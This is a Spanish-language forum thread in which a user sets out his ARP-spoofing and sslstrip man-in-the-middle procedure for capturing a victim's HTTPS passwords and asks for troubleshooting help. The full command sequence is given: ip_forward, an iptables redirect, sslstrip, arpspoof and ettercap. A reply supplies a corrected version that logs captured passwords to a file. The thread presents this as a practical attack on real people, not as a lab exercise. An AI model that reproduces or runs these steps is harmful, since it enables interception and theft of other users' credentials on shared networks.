Mostraré los pasos que hago para poder sacar contraseñas protegidas por SSL, y el momento en el que se me desconecta internet (Luego tengo que reiniciar el pc, puesto que no vuelve a conectarse mas).
1) Pongo la maquina en modo ip_fordward = 1
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Redireccion el trafico http del puerto 80 al 1000 con iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
3)Corro sslstrip en el puerto 1000
sslstrip.py -l 1000
4)Corro arpspoof
arpspoof -i interface -t iptarget iprouter
5)Corro ettercap
ettercap -Tqz -u -i interface
NOTA= agrego el -u para que no me cambie el ipforward a 0, ya que ettercap por defecto lo hace.
Este procedimiento lo hice en 2 lugares distintos, en uno conectados con un Router D-link DI-524.
Tuve el problema de que la victima se caía continuamente.
En el otro conectados con un modem inalambrico motorola SBG900, sin embargo en este apenas empiezo a correr ettercap, se me cae a mi el internet.
Datos importantes:
trabajo en debian 6, 2.6.32-5-686.
mi tarjeta de red es una Broadcom BCM4312.
nota 2 = no uso la tarjeta en modo monitor, ya que veo que en ocasiones mucho mejor en modo managed.
Muchas gracias
Te recomiendo que uses Wireshark:
http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfo
Saludos.
Cita de: alpha015 en 2 Enero 2012, 00:25 AM
Te recomiendo que uses Wireshark:
Wireshark Ettercap...... ;-)
Hola!! en teoría, poniendo a 1 el ip_forward, no debería darte problemas, aún así, yo hago lo siguiente:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
arpspoof -i interface -t iptarget iprouter
arpspoof -i interface -t iprouter iptarget
sslstrip -w fichero.txt
Si solo quieres passwords del protocolo https (protocolo SsL), no te hace falta ettercap, el mismo sslstrip te las almacena en 'fichero.txt'
Saludos ;)